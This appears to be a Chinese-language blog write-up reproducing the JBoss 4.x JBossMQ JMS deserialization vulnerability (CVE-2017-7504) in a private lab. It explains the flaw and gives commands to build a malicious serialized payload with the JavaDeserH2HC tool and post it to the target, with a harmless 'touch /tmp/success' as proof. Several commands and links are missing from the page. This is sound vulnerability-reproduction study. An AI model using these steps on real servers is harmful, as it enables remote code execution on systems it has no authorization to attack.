JBoss 4.x JBossMQ JMS(CVE-2017-7504)漏洞复现
JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504)
文章目录
- JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504)
- 漏洞原理
- 实验环境
- 漏洞环境
- 漏洞复现
漏洞原理
Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。
实验环境
一、靶机:
系统:ubuntu搭建的测试靶场
IP:192.168.88.129
二、攻击机:
系统:kali
IP:192.168.88.130
漏洞环境
启动JBoss AS 4.0.5:
环境启动后,可在浏览器页面成功访问http://192.168.88.129:8080/:
漏洞复现
一、参考利用JavaDeserH2HC工具,编译并生成序列化数据
下载工具命令:
#git clone
编译并生成序列化数据
其中:
#javac -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap.java 初始化工具
#java -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap “touch /tmp/success” 生成序列化恶意数据文件
注:在执行中出现:-bash:javac:未找到命令
解决方法:apt-get install default-jdk
二、进行网站访问,实现漏洞利用
网站访问:
–data-binary 意为以二进制的方式post数据
验证:
进入容器shell(docker相当于小型虚拟机),发现success
参考链接:
/
.html
发布评论